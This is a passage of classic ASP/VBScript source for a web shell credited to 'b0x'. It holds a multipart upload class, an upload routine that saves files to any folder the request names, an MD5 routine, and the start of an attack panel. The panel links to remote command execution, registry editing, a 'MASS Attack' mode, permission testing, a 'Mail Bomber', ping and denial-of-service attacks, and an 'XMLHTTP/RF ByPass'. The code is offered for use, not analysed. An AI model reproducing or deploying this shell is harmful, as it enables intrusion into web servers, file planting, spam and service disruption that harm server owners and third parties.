  1060. Private Sub ParseDelimiter()
  1061. mstrDelimiter = MidB(mbinData, 1, InStrB(1, mbinData, CRLF) - 1)
  1062. End Sub
  1063.  
  1064. Private Sub ParseData()
  1065. Dim llngStart
  1066. Dim llngLength
  1067. Dim llngEnd
  1068. Dim lbinChunk
  1069. llngStart = 1
  1070. llngStart = InStrB(llngStart, mbinData, mstrDelimiter & CRLF)
  1071. While Not llngStart = 0
  1072. llngEnd = InStrB(llngStart + 1, mbinData, mstrDelimiter) - 2
  1073. llngLength = llngEnd - llngStart
  1074. lbinChunk = MidB(mbinData, llngStart, llngLength)
  1075. Call ParseChunk(lbinChunk)
  1076. llngStart = InStrB(llngStart + 1, mbinData, mstrDelimiter & CRLF)
  1077. Wend
  1078. End Sub
  1079.  
  1080. Private Sub ParseChunk(ByRef pbinChunk)
  1081. Dim lstrName
  1082. Dim lstrFileName
  1083. Dim lstrContentType
  1084. Dim lbinData
  1085. Dim lstrDisposition
  1086. Dim lstrValue
  1087. lstrDisposition = ParseDisposition(pbinChunk)
  1088. lstrName = ParseName(lstrDisposition)
  1089. lstrFileName = ParseFileName(lstrDisposition)
  1090. lstrContentType = ParseContentType(pbinChunk)
  1091. If lstrContentType = "" Then
  1092. lstrValue = CStrU(ParseBinaryData(pbinChunk))
  1093. Else
  1094. lbinData = ParseBinaryData(pbinChunk)
  1095. End If
  1096. Call AddField(lstrName, lstrFileName, lstrContentType, lstrValue, lbinData)
  1097. End Sub
  1098.  
  1099. Private Sub AddField(ByRef pstrName, ByRef pstrFileName, ByRef pstrContentType, ByRef pstrValue, ByRef pbinData)
  1100. Dim lobjField
  1101. ReDim Preserve mobjFieldAry(mlngCount)
  1102. Set lobjField = New clsField
  1103. lobjField.Name = pstrName
  1104. lobjField.FilePath = pstrFileName
  1105. lobjField.ContentType = pstrContentType
  1106. If LenB(pbinData) = 0 Then
  1107. lobjField.BinaryData = ChrB(0)
  1108. lobjField.Value = pstrValue
  1109. lobjField.Length = Len(pstrValue)
  1110. Else
  1111. lobjField.BinaryData = pbinData
  1112. lobjField.Length = LenB(pbinData)
  1113. lobjField.Value = ""
  1114. End If
  1115. Set mobjFieldAry(mlngCount) = lobjField
  1116. mlngCount = mlngCount + 1
  1117. End Sub
  1118.  
  1119. Private Function ParseBinaryData(ByRef pbinChunk)
  1120. Dim llngStart
  1121. llngStart = InStrB(1, pbinChunk, CRLF & CRLF)
  1122. If llngStart = 0 Then Exit Function
  1123. llngStart = llngStart + 4
  1124. ParseBinaryData = MidB(pbinChunk, llngStart)
  1125. End Function
  1126.  
  1127. Private Function ParseContentType(ByRef pbinChunk)
  1128. Dim llngStart
  1129. Dim llngEnd
  1130. Dim llngLength
  1131. llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Type:"), vbTextCompare)
  1132. If llngStart = 0 Then Exit Function
  1133. llngEnd = InStrB(llngStart + 15, pbinChunk, CR)
  1134. If llngEnd = 0 Then Exit Function
  1135. llngStart = llngStart + 15
  1136. If llngStart >= llngEnd Then Exit Function
  1137. llngLength = llngEnd - llngStart
  1138. ParseContentType = Trim(CStrU(MidB(pbinChunk, llngStart, llngLength)))
  1139. End Function
  1140.  
  1141. Private Function ParseDisposition(ByRef pbinChunk)
  1142. Dim llngStart
  1143. Dim llngEnd
  1144. Dim llngLength
  1145. llngStart = InStrB(1, pbinChunk, CRLF & CStrB("Content-Disposition:"), vbTextCompare)
  1146. If llngStart = 0 Then Exit Function
  1147. llngEnd = InStrB(llngStart + 22, pbinChunk, CRLF)
  1148. If llngEnd = 0 Then Exit Function
  1149. llngStart = llngStart + 22
  1150. If llngStart >= llngEnd Then Exit Function
  1151. llngLength = llngEnd - llngStart
  1152. ParseDisposition = CStrU(MidB(pbinChunk, llngStart, llngLength))
  1153. End Function
  1154.  
  1155. Private Function ParseName(ByRef pstrDisposition)
  1156. Dim llngStart
  1157. Dim llngEnd
  1158. Dim llngLength
  1159. llngStart = InStr(1, pstrDisposition, "name=""", vbTextCompare)
  1160. If llngStart = 0 Then Exit Function
  1161. llngEnd = InStr(llngStart + 6, pstrDisposition, """")
  1162. If llngEnd = 0 Then Exit Function
  1163. llngStart = llngStart + 6
  1164. If llngStart >= llngEnd Then Exit Function
  1165. llngLength = llngEnd - llngStart
  1166. ParseName = Mid(pstrDisposition, llngStart, llngLength)
  1167. End Function
  1168.  
  1169. Private Function ParseFileName(ByRef pstrDisposition)
  1170. Dim llngStart
  1171. Dim llngEnd
  1172. Dim llngLength
  1173. llngStart = InStr(1, pstrDisposition, "filename=""", vbTextCompare)
  1174. If llngStart = 0 Then Exit Function
  1175. llngEnd = InStr(llngStart + 10, pstrDisposition, """")
  1176. If llngEnd = 0 Then Exit Function
  1177. llngStart = llngStart + 10
  1178. If llngStart >= llngEnd Then Exit Function
  1179. llngLength = llngEnd - llngStart
  1180. ParseFileName = Mid(pstrDisposition, llngStart, llngLength)
  1181. End Function
  1182.  
  1183. Public Property Get Count()
  1184. Count = mlngCount
  1185. End Property
  1186.  
  1187. Public Default Property Get Fields(ByVal pstrName)
  1188. Dim llngIndex
  1189. If IsNumeric(pstrName) Then
  1190. llngIndex = CLng(pstrName)
  1191. If llngIndex > mlngCount - 1 Or llngIndex < 0 Then
  1192. Call Err.Raise(vbObjectError + 1, "clsUpload.asp", "Object does not exist within the ordinal reference.")
  1193. Exit Property
  1194. End If
  1195. Set Fields = mobjFieldAry(pstrName)
  1196. Else
  1197. pstrName = LCase(pstrname)
  1198. For llngIndex = 0 To mlngCount - 1
  1199. If LCase(mobjFieldAry(llngIndex).Name) = pstrName Then
  1200. Set Fields = mobjFieldAry(llngIndex)
  1201. Exit Property
  1202. End If
  1203. Next
  1204. End If
  1205. Set Fields = New clsField
  1206. End Property
  1207.  
  1208. Private Sub Class_Terminate()
  1209. Dim llngIndex
  1210. For llngIndex = 0 To mlngCount - 1
  1211. Set mobjFieldAry(llngIndex) = Nothing
  1212.  
  1213. Next
  1214. ReDim mobjFieldAry(-1)
  1215. End Sub
  1216.  
  1217. Private Sub Class_Initialize()
  1218. ReDim mobjFieldAry(-1)
  1219. CR = ChrB(Asc(vbCr))
  1220. LF = ChrB(Asc(vbLf))
  1221. CRLF = CR & LF
  1222. mlngCount = 0
  1223. Call RequestData
  1224. Call ParseDelimiter()
  1225. Call ParseData
  1226. End Sub
  1227.  
  1228. Private Function CStrU(ByRef pstrANSI)
  1229. Dim llngLength
  1230. Dim llngIndex
  1231. llngLength = LenB(pstrANSI)
  1232. For llngIndex = 1 To llngLength
  1233. CStrU = CStrU & Chr(AscB(MidB(pstrANSI, llngIndex, 1)))
  1234. Next
  1235. End Function
  1236.  
  1237. Private Function CStrB(ByRef pstrUnicode)
  1238. Dim llngLength
  1239. Dim llngIndex
  1240. llngLength = Len(pstrUnicode)
  1241. For llngIndex = 1 To llngLength
  1242. CStrB = CStrB & ChrB(Asc(Mid(pstrUnicode, llngIndex, 1)))
  1243. Next
  1244. End Function
  1245. End Class
  1246.  
  1247. Class clsField
  1248. Public Name
  1249. Private mstrPath
  1250. Public FileDir
  1251. Public FileExt
  1252. Public FileName
  1253. Public ContentType
  1254. Public Value
  1255. Public BinaryData
  1256. Public Length
  1257. Private mstrText
  1258.  
  1259. Public Property Get BLOB()
  1260. BLOB = BinaryData
  1261. End Property
  1262.  
  1263. Public Function BinaryAsText()
  1264. Dim lbinBytes
  1265. Dim lobjRs
  1266. If Length = 0 Then Exit Function
  1267. If LenB(BinaryData) = 0 Then Exit Function
  1268.  
  1269. If Not Len(mstrText) = 0 Then
  1270. BinaryAsText = mstrText
  1271. Exit Function
  1272. End If
  1273. lbinBytes = ASCII2Bytes(BinaryData)
  1274. mstrText = Bytes2Unicode(lbinBytes)
  1275. BinaryAsText = mstrText
  1276. End Function
  1277.  
  1278. Public Sub SaveAs(ByRef pstrFileName)
  1279. Const adTypeBinary=1
  1280. Const adSaveCreateOverWrite=2
  1281. Dim lobjStream
  1282. Dim lobjRs
  1283. Dim lbinBytes
  1284. If Length = 0 Then Exit Sub
  1285. If LenB(BinaryData) = 0 Then Exit Sub
  1286. Set lobjStream = Server.CreateObject("ADODB.Stream")
  1287. lobjStream.Type = adTypeBinary
  1288. Call lobjStream.Open()
  1289. lbinBytes = ASCII2Bytes(BinaryData)
  1290. Call lobjStream.Write(lbinBytes)
  1291.  
  1292. On Error Resume Next
  1293.  
  1294. Call lobjStream.SaveToFile(pstrFileName, adSaveCreateOverWrite)
  1295.  
  1296. 'if err<>0 then response.Write "<br>"&err.Description
  1297.  
  1298. Call lobjStream.Close()
  1299. Set lobjStream = Nothing
  1300. End Sub
  1301.  
  1302. Public Property Let FilePath(ByRef pstrPath)
  1303. mstrPath = pstrPath
  1304. If Not InStrRev(pstrPath, ".") = 0 Then
  1305. FileExt = Mid(pstrPath, InStrRev(pstrPath, ".") + 1)
  1306. FileExt = UCase(FileExt)
  1307. End If
  1308. If Not InStrRev(pstrPath, "\") = 0 Then
  1309. FileName = Mid(pstrPath, InStrRev(pstrPath, "\") + 1)
  1310. End If
  1311. If Not InStrRev(pstrPath, "\") = 0 Then
  1312. FileDir = Mid(pstrPath, 1, InStrRev(pstrPath, "\") - 1)
  1313. End If
  1314. End Property
  1315.  
  1316. Public Property Get FilePath()
  1317. FilePath = mstrPath
  1318. End Property
  1319.  
  1320. private Function ASCII2Bytes(ByRef pbinBinaryData)
  1321. Const adLongVarBinary=205
  1322. Dim lobjRs
  1323. Dim llngLength
  1324. Dim lbinBuffer
  1325. llngLength = LenB(pbinBinaryData)
  1326. Set lobjRs = Server.CreateObject("ADODB.Recordset")
  1327. Call lobjRs.Fields.Append("BinaryData", adLongVarBinary, llngLength)
  1328. Call lobjRs.Open()
  1329. Call lobjRs.AddNew()
  1330. Call lobjRs.Fields("BinaryData").AppendChunk(pbinBinaryData & ChrB(0))
  1331. Call lobjRs.Update()
  1332. lbinBuffer = lobjRs.Fields("BinaryData").GetChunk(llngLength)
  1333. Call lobjRs.Close()
  1334. Set lobjRs = Nothing
  1335. ASCII2Bytes = lbinBuffer
  1336. End Function
  1337.  
  1338. Private Function Bytes2Unicode(ByRef pbinBytes)
  1339. Dim lobjRs
  1340. Dim llngLength
  1341. Dim lstrBuffer
  1342. llngLength = LenB(pbinBytes)
  1343. Set lobjRs = Server.CreateObject("ADODB.Recordset")
  1344. Call lobjRs.Fields.Append("BinaryData", adLongVarChar, llngLength)
  1345. Call lobjRs.Open()
  1346. Call lobjRs.AddNew()
  1347. Call lobjRs.Fields("BinaryData").AppendChunk(pbinBytes)
  1348. Call lobjRs.Update()
  1349. lstrBuffer = lobjRs.Fields("BinaryData").Value
  1350. Call lobjRs.Close()
  1351. Set lobjRs = Nothing
  1352. Bytes2Unicode = lstrBuffer
  1353. End Function
  1354. End Class
  1355.  
  1356. function addslash(path)
  1357. if right(path,1)="\" then addslash=path else addslash=path & "\"
  1358. end function
  1359.  
  1360. sub Upload()
  1361. dim objUpload,f,max,i,name,path,size,success
  1362.  
  1363. set objUpload=New clsUpload
  1364.  
  1365. targetPath=objUpload.Fields("folder").Value
  1366. max=objUpload.Fields("max").Value
  1367.  
  1368. for i=1 to max
  1369. name=objUpload.Fields("file" & i).FileName
  1370. size=objUpload.Fields("file" & i).Length
  1371. if (name<>"") and (size>0) then
  1372. gMsg=gMsg & "<br>" & vbNewLine & "- " & name & " (" & FormatNumber(size,0) & " bytes): "
  1373. path=addslash(targetPath) & name
  1374. objUpload.Fields("file" & i).SaveAs path
  1375.  
  1376. if b0x.FileExists(path) then
  1377. on error resume next
  1378. set f=objb0x.GetFile(path)
  1379. if IsObject(f) then
  1380. if f.Size=size then success=true else success=false
  1381. end if
  1382. set f=nothing
  1383. end if
  1384. if success then gMsg=gMsg & "<font color=blue>uploaded</font>" else gMsg = gMsg & "<font color=red>failed!</font>"
  1385. end if
  1386. next
  1387. response.Write gMsg
  1388. set objUpload=nothing
  1389.  
  1390. end sub
  1391.  
  1392.  
  1393.  
  1394. ' MD5 kodlama ba?lad??..
  1395. Private Const BITS_TO_A_BYTE = 8
  1396. Private Const BYTES_TO_A_WORD = 4
  1397. Private Const BITS_TO_A_WORD = 32
  1398.  
  1399. Private m_lOnBits(30)
  1400. Private m_l2Power(30)
  1401.  
  1402. m_lOnBits(0) = CLng(1)
  1403. m_lOnBits(1) = CLng(3)
  1404. m_lOnBits(2) = CLng(7)
  1405. m_lOnBits(3) = CLng(15)
  1406. m_lOnBits(4) = CLng(31)
  1407. m_lOnBits(5) = CLng(63)
  1408. m_lOnBits(6) = CLng(127)
  1409. m_lOnBits(7) = CLng(255)
  1410. m_lOnBits(8) = CLng(511)
  1411. m_lOnBits(9) = CLng(1023)
  1412. m_lOnBits(10) = CLng(2047)
  1413. m_lOnBits(11) = CLng(4095)
  1414. m_lOnBits(12) = CLng(8191)
  1415. m_lOnBits(13) = CLng(16383)
  1416. m_lOnBits(14) = CLng(32767)
  1417. m_lOnBits(15) = CLng(65535)
  1418. m_lOnBits(16) = CLng(131071)
  1419. m_lOnBits(17) = CLng(262143)
  1420. m_lOnBits(18) = CLng(524287)
  1421. m_lOnBits(19) = CLng(1048575)
  1422. m_lOnBits(20) = CLng(2097151)
  1423. m_lOnBits(21) = CLng(4194303)
  1424. m_lOnBits(22) = CLng(8388607)
  1425. m_lOnBits(23) = CLng(16777215)
  1426. m_lOnBits(24) = CLng(33554431)
  1427. m_lOnBits(25) = CLng(67108863)
  1428. m_lOnBits(26) = CLng(134217727)
  1429. m_lOnBits(27) = CLng(268435455)
  1430. m_lOnBits(28) = CLng(536870911)
  1431. m_lOnBits(29) = CLng(1073741823)
  1432. m_lOnBits(30) = CLng(2147483647)
  1433.  
  1434. m_l2Power(0) = CLng(1)
  1435. m_l2Power(1) = CLng(2)
  1436. m_l2Power(2) = CLng(4)
  1437. m_l2Power(3) = CLng(8)
  1438. m_l2Power(4) = CLng(16)
  1439. m_l2Power(5) = CLng(32)
  1440. m_l2Power(6) = CLng(64)
  1441. m_l2Power(7) = CLng(128)
  1442. m_l2Power(8) = CLng(256)
  1443. m_l2Power(9) = CLng(512)
  1444. m_l2Power(10) = CLng(1024)
  1445. m_l2Power(11) = CLng(2048)
  1446. m_l2Power(12) = CLng(4096)
  1447. m_l2Power(13) = CLng(8192)
  1448. m_l2Power(14) = CLng(16384)
  1449. m_l2Power(15) = CLng(32768)
  1450. m_l2Power(16) = CLng(65536)
  1451. m_l2Power(17) = CLng(131072)
  1452. m_l2Power(18) = CLng(262144)
  1453. m_l2Power(19) = CLng(524288)
  1454. m_l2Power(20) = CLng(1048576)
  1455. m_l2Power(21) = CLng(2097152)
  1456. m_l2Power(22) = CLng(4194304)
  1457. m_l2Power(23) = CLng(8388608)
  1458. m_l2Power(24) = CLng(16777216)
  1459. m_l2Power(25) = CLng(33554432)
  1460. m_l2Power(26) = CLng(67108864)
  1461. m_l2Power(27) = CLng(134217728)
  1462. m_l2Power(28) = CLng(268435456)
  1463. m_l2Power(29) = CLng(536870912)
  1464. m_l2Power(30) = CLng(1073741824)
  1465.  
  1466. Private Function LShift(lValue, iShiftBits)
  1467. If iShiftBits = 0 Then
  1468. LShift = lValue
  1469. Exit Function
  1470. ElseIf iShiftBits = 31 Then
  1471. If lValue And 1 Then
  1472. LShift = &H80000000
  1473. Else
  1474. LShift = 0
  1475. End If
  1476. Exit Function
  1477. ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
  1478. Err.Raise 6
  1479. End If
  1480.  
  1481. If (lValue And m_l2Power(31 - iShiftBits)) Then
  1482. LShift = ((lValue And m_lOnBits(31 - (iShiftBits + 1))) * m_l2Power(iShiftBits)) Or &H80000000
  1483. Else
  1484. LShift = ((lValue And m_lOnBits(31 - iShiftBits)) * m_l2Power(iShiftBits))
  1485. End If
  1486. End Function
  1487. Private Function RShift(lValue, iShiftBits)
  1488. If iShiftBits = 0 Then
  1489. RShift = lValue
  1490. Exit Function
  1491. ElseIf iShiftBits = 31 Then
  1492. If lValue And &H80000000 Then
  1493. RShift = 1
  1494. Else
  1495. RShift = 0
  1496. End If
  1497. Exit Function
  1498. ElseIf iShiftBits < 0 Or iShiftBits > 31 Then
  1499. Err.Raise 6
  1500. End If
  1501.  
  1502. RShift = (lValue And &H7FFFFFFE) \ m_l2Power(iShiftBits)
  1503.  
  1504. If (lValue And &H80000000) Then
  1505. RShift = (RShift Or (&H40000000 \ m_l2Power(iShiftBits - 1)))
  1506. End If
  1507. End Function
  1508.  
  1509. Private Function RotateLeft(lValue, iShiftBits)
  1510. RotateLeft = LShift(lValue, iShiftBits) Or RShift(lValue, (32 - iShiftBits))
  1511. End Function
  1512.  
  1513. Private Function AddUnsigned(lX, lY)
  1514. Dim lX4
  1515. Dim lY4
  1516. Dim lX8
  1517. Dim lY8
  1518. Dim lResult
  1519.  
  1520. lX8 = lX And &H80000000
  1521. lY8 = lY And &H80000000
  1522. lX4 = lX And &H40000000
  1523. lY4 = lY And &H40000000
  1524.  
  1525. lResult = (lX And &H3FFFFFFF) + (lY And &H3FFFFFFF)
  1526.  
  1527. If lX4 And lY4 Then
  1528. lResult = lResult Xor &H80000000 Xor lX8 Xor lY8
  1529. ElseIf lX4 Or lY4 Then
  1530. If lResult And &H40000000 Then
  1531. lResult = lResult Xor &HC0000000 Xor lX8 Xor lY8
  1532. Else
  1533. lResult = lResult Xor &H40000000 Xor lX8 Xor lY8
  1534. End If
  1535. Else
  1536. lResult = lResult Xor lX8 Xor lY8
  1537. End If
  1538.  
  1539. AddUnsigned = lResult
  1540. End Function
  1541.  
  1542. Private Function Fq(x, y, z)
  1543. Fq = (x And y) Or ((Not x) And z)
  1544. End Function
  1545.  
  1546. Private Function Gq(x, y, z)
  1547. Gq = (x And z) Or (y And (Not z))
  1548. End Function
  1549.  
  1550. Private Function Hq(x, y, z)
  1551. Hq = (x Xor y Xor z)
  1552. End Function
  1553.  
  1554. Private Function Iq(x, y, z)
  1555. Iq = (y Xor (x Or (Not z)))
  1556. End Function
  1557.  
  1558. Private Sub FF(a, b, c, d, x, s, ac)
  1559. a = AddUnsigned(a, AddUnsigned(AddUnsigned(Fq(b, c, d), x), ac))
  1560. a = RotateLeft(a, s)
  1561. a = AddUnsigned(a, b)
  1562. End Sub
  1563.  
  1564. Private Sub GG(a, b, c, d, x, s, ac)
  1565. a = AddUnsigned(a, AddUnsigned(AddUnsigned(Gq(b, c, d), x), ac))
  1566. a = RotateLeft(a, s)
  1567. a = AddUnsigned(a, b)
  1568. End Sub
  1569.  
  1570. Private Sub HH(a, b, c, d, x, s, ac)
  1571. a = AddUnsigned(a, AddUnsigned(AddUnsigned(Hq(b, c, d), x), ac))
  1572. a = RotateLeft(a, s)
  1573. a = AddUnsigned(a, b)
  1574. End Sub
  1575.  
  1576. Private Sub II(a, b, c, d, x, s, ac)
  1577. a = AddUnsigned(a, AddUnsigned(AddUnsigned(Iq(b, c, d), x), ac))
  1578. a = RotateLeft(a, s)
  1579. a = AddUnsigned(a, b)
  1580. End Sub
  1581.  
  1582. '*********************************************************
  1583. '************* COnverted Developed By TurkisH-RuleZ ****************
  1584. '******* The Brute Algortihms Owned to b0x ;) ******
  1585. '*********************************************************
  1586. '*********************************************************
  1587.  
  1588. Private Function ConvertToWordArray(sMessage)
  1589. Dim lMessageLength
  1590. Dim lNumberOfWords
  1591. Dim lWordArray()
  1592. Dim lBytePosition
  1593. Dim lByteCount
  1594. Dim lWordCount
  1595.  
  1596. Const MODULUS_BITS = 512
  1597. Const CONGRUENT_BITS = 448
  1598.  
  1599. lMessageLength = Len(sMessage)
  1600.  
  1601. lNumberOfWords = (((lMessageLength + ((MODULUS_BITS - CONGRUENT_BITS) \ BITS_TO_A_BYTE)) \ (MODULUS_BITS \ BITS_TO_A_BYTE)) + 1) * (MODULUS_BITS \ BITS_TO_A_WORD)
  1602. ReDim lWordArray(lNumberOfWords - 1)
  1603.  
  1604. lBytePosition = 0
  1605. lByteCount = 0
  1606. Do Until lByteCount >= lMessageLength
  1607. lWordCount = lByteCount \ BYTES_TO_A_WORD
  1608. lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
  1609. lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(Asc(Mid(sMessage, lByteCount + 1, 1)), lBytePosition)
  1610. lByteCount = lByteCount + 1
  1611. Loop
  1612.  
  1613. lWordCount = lByteCount \ BYTES_TO_A_WORD
  1614. lBytePosition = (lByteCount Mod BYTES_TO_A_WORD) * BITS_TO_A_BYTE
  1615.  
  1616. lWordArray(lWordCount) = lWordArray(lWordCount) Or LShift(&H80, lBytePosition)
  1617.  
  1618. lWordArray(lNumberOfWords - 2) = LShift(lMessageLength, 3)
  1619. lWordArray(lNumberOfWords - 1) = RShift(lMessageLength, 29)
  1620.  
  1621. ConvertToWordArray = lWordArray
  1622. End Function
  1623.  
  1624. Private Function WordToHex(lValue)
  1625. Dim lByte
  1626. Dim lCount
  1627.  
  1628. For lCount = 0 To 3
  1629. lByte = RShift(lValue, lCount * BITS_TO_A_BYTE) And m_lOnBits(BITS_TO_A_BYTE - 1)
  1630. WordToHex = WordToHex & Right("0" & Hex(lByte), 2)
  1631. Next
  1632. End Function
  1633.  
  1634.  
  1635. Public Function MD5(sMessage)
  1636. Dim x
  1637. Dim k
  1638. Dim AA
  1639. Dim BB
  1640. Dim CC
  1641. Dim DD
  1642. Dim a
  1643. Dim b
  1644. Dim c
  1645. Dim d
  1646.  
  1647. Const S11 = 7
  1648. Const S12 = 12
  1649. Const S13 = 17
  1650. Const S14 = 22
  1651. Const S21 = 5
  1652. Const S22 = 9
  1653. Const S23 = 14
  1654. Const S24 = 20
  1655. Const S31 = 4
  1656. Const S32 = 11
  1657. Const S33 = 16
  1658. Const S34 = 23
  1659. Const S41 = 6
  1660. Const S42 = 10
  1661. Const S43 = 15
  1662. Const S44 = 21
  1663.  
  1664. x = ConvertToWordArray(sMessage)
  1665.  
  1666. a = &H67452301
  1667. b = &HEFCDAB89
  1668. c = &H98BADCFE
  1669. d = &H10325476
  1670.  
  1671. For k = 0 To UBound(x) Step 16
  1672. AA = a
  1673. BB = b
  1674. CC = c
  1675. DD = d
  1676.  
  1677. FF a, b, c, d, x(k + 0), S11, &HD76AA478
  1678. FF d, a, b, c, x(k + 1), S12, &HE8C7B756
  1679. FF c, d, a, b, x(k + 2), S13, &H242070DB
  1680. FF b, c, d, a, x(k + 3), S14, &HC1BDCEEE
  1681. FF a, b, c, d, x(k + 4), S11, &HF57C0FAF
  1682. FF d, a, b, c, x(k + 5), S12, &H4787C62A
  1683. FF c, d, a, b, x(k + 6), S13, &HA8304613
  1684. FF b, c, d, a, x(k + 7), S14, &HFD469501
  1685. FF a, b, c, d, x(k + 8), S11, &H698098D8
  1686. FF d, a, b, c, x(k + 9), S12, &H8B44F7AF
  1687. FF c, d, a, b, x(k + 10), S13, &HFFFF5BB1
  1688. FF b, c, d, a, x(k + 11), S14, &H895CD7BE
  1689. FF a, b, c, d, x(k + 12), S11, &H6B901122
  1690. FF d, a, b, c, x(k + 13), S12, &HFD987193
  1691. FF c, d, a, b, x(k + 14), S13, &HA679438E
  1692. FF b, c, d, a, x(k + 15), S14, &H49B40821
  1693.  
  1694. GG a, b, c, d, x(k + 1), S21, &HF61E2562
  1695. GG d, a, b, c, x(k + 6), S22, &HC040B340
  1696. GG c, d, a, b, x(k + 11), S23, &H265E5A51
  1697. GG b, c, d, a, x(k + 0), S24, &HE9B6C7AA
  1698. GG a, b, c, d, x(k + 5), S21, &HD62F105D
  1699. GG d, a, b, c, x(k + 10), S22, &H2441453
  1700. GG c, d, a, b, x(k + 15), S23, &HD8A1E681
  1701. GG b, c, d, a, x(k + 4), S24, &HE7D3FBC8
  1702. GG a, b, c, d, x(k + 9), S21, &H21E1CDE6
  1703. GG d, a, b, c, x(k + 14), S22, &HC33707D6
  1704. GG c, d, a, b, x(k + 3), S23, &HF4D50D87
  1705. GG b, c, d, a, x(k + 8), S24, &H455A14ED
  1706. GG a, b, c, d, x(k + 13), S21, &HA9E3E905
  1707. GG d, a, b, c, x(k + 2), S22, &HFCEFA3F8
  1708. GG c, d, a, b, x(k + 7), S23, &H676F02D9
  1709. GG b, c, d, a, x(k + 12), S24, &H8D2A4C8A
  1710.  
  1711. HH a, b, c, d, x(k + 5), S31, &HFFFA3942
  1712. HH d, a, b, c, x(k + 8), S32, &H8771F681
  1713. HH c, d, a, b, x(k + 11), S33, &H6D9D6122
  1714. HH b, c, d, a, x(k + 14), S34, &HFDE5380C
  1715. HH a, b, c, d, x(k + 1), S31, &HA4BEEA44
  1716. HH d, a, b, c, x(k + 4), S32, &H4BDECFA9
  1717. HH c, d, a, b, x(k + 7), S33, &HF6BB4B60
  1718. HH b, c, d, a, x(k + 10), S34, &HBEBFBC70
  1719. HH a, b, c, d, x(k + 13), S31, &H289B7EC6
  1720. HH d, a, b, c, x(k + 0), S32, &HEAA127FA
  1721. HH c, d, a, b, x(k + 3), S33, &HD4EF3085
  1722. HH b, c, d, a, x(k + 6), S34, &H4881D05
  1723. HH a, b, c, d, x(k + 9), S31, &HD9D4D039
  1724. HH d, a, b, c, x(k + 12), S32, &HE6DB99E5
  1725. HH c, d, a, b, x(k + 15), S33, &H1FA27CF8
  1726. HH b, c, d, a, x(k + 2), S34, &HC4AC5665
  1727.  
  1728. II a, b, c, d, x(k + 0), S41, &HF4292244
  1729. II d, a, b, c, x(k + 7), S42, &H432AFF97
  1730. II c, d, a, b, x(k + 14), S43, &HAB9423A7
  1731. II b, c, d, a, x(k + 5), S44, &HFC93A039
  1732. II a, b, c, d, x(k + 12), S41, &H655B59C3
  1733. II d, a, b, c, x(k + 3), S42, &H8F0CCC92
  1734. II c, d, a, b, x(k + 10), S43, &HFFEFF47D
  1735. II b, c, d, a, x(k + 1), S44, &H85845DD1
  1736. II a, b, c, d, x(k + 8), S41, &H6FA87E4F
  1737. II d, a, b, c, x(k + 15), S42, &HFE2CE6E0
  1738. II c, d, a, b, x(k + 6), S43, &HA3014314
  1739. II b, c, d, a, x(k + 13), S44, &H4E0811A1
  1740. II a, b, c, d, x(k + 4), S41, &HF7537E82
  1741. II d, a, b, c, x(k + 11), S42, &HBD3AF235
  1742. II c, d, a, b, x(k + 2), S43, &H2AD7D2BB
  1743. II b, c, d, a, x(k + 9), S44, &HEB86D391
  1744.  
  1745. a = AddUnsigned(a, AA)
  1746. b = AddUnsigned(b, BB)
  1747. c = AddUnsigned(c, CC)
  1748. d = AddUnsigned(d, DD)
  1749. Next
  1750.  
  1751. MD5 = LCase(WordToHex(a) & WordToHex(b) & WordToHex(c) & WordToHex(d))
  1752. End Function
  1753. '***************************************************************************************************************************
  1754. '*************************** MD5 KOdlar? Biter. *************************************************************************
  1755. '***************************************************************************************************************************
  1756. if popup = False then
  1757. 'Link ve Path paneli by b0x
  1758. 'T?rk Bayra?? Ascii Karakterlerle - Created By b0x
  1759. Response.Write "<center><table width=80 height=50 cellpadding=0 cellspacing=0><tr><td width=10 align=left valign=middle style=""background-color:AA0000"">&nbsp;</td><td width=70 align=left valign=middle style=""background-color:AA0000""><font size=7 face=Wingdings>Z</font></td></tr></table></center>"
  1760. response.write "<center><table width=""100%"" align=""center"">"
  1761. response.write "<tr valign=""top""><td colspan=""2"" align=""center""><br>"
  1762. response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<a href='"&FilePath&"?mode=37&Path="&Path&"&Time="&time&"'><b>System Information *</b></a> | <a href='"&FilePath&"?mode=18&Path="&Path&"&Time="&time&"' onclick=""mass(this.href);return false;""><b>MASS Attack</b></a> | <a href='"&FilePath&"?mode=21&Path="&FolderPath&"&Time="&time&"' onclick=""tester(this.href);return false;""><b> Permission Tester </b></a> | <a href='"&FilePath&"?mode=24&Path="&Path&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b>Folder Options </b></a> | <a href='"&FilePath&"?mode=28&Path="&Path&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> CMD </b></a> | <a href='"&FilePath&"?mode=34&Path="&Path&"&Time="&time&"' ><b> My-MS_SQL </b></a> | <a href='"&FilePath&"?mode=45&Path="&Path&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> RegEdit </b></a> | <a href='"&FilePath&"?mode=99&Path="&Path&"&Time="&time&"' onclick=""biz(this.href);return false;""><b> *Contact Us*! </b></a>&nbsp;&nbsp;&nbsp;</td></tr></table><br>"
  1763. response.write "<table cellpadding=""0"" cellspacing=""0"" height=""25""><tr><td class=""kbrtm"">&nbsp;&nbsp;&nbsp;<a href='"&FilePath&"?mode=30&Path="&Path&"&Time="&time&"' onclick=""cmd(this.href);return false;""><b> Ping Attack? </b></a> | <a href='"&FilePath&"?mode=33&Path="&Path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Mail Bomber? </b></a> | <a href='"&FilePath&"?mode=31&Path="&Path&"&Time="&time&"' onclick=""klasorkopya(this.href);return false;""><b> Ram & Cpu Attack </b></a> | <a href='"&FilePath&"?mode=32&Path="&Path&"&Time="&time&"' onclick=""somur(this.href);return false;""><b> Denial OF Service Attack </b></a> | <a href='"&FilePath&"?mode=39&Path="&Path&"&Time="&time&"' onclick=""klasor(this.href);return false;""><b> MD5 & Serv-U </b></a> | <a href='"&FilePath&"?mode=42&Path="&Path&"&Time="&time&"' onclick=""mass(this.href);return false;""><b> MSWCTools </b></a> | <a href='"&FilePath&"?mode=44&Path="&Path&"&Time="&time&"' onclick=""mass(this.href);return false;""><b> XMLHTTP/RF ByPass </b></a>&nbsp;&nbsp;&nbsp;</td></tr></table><br>"
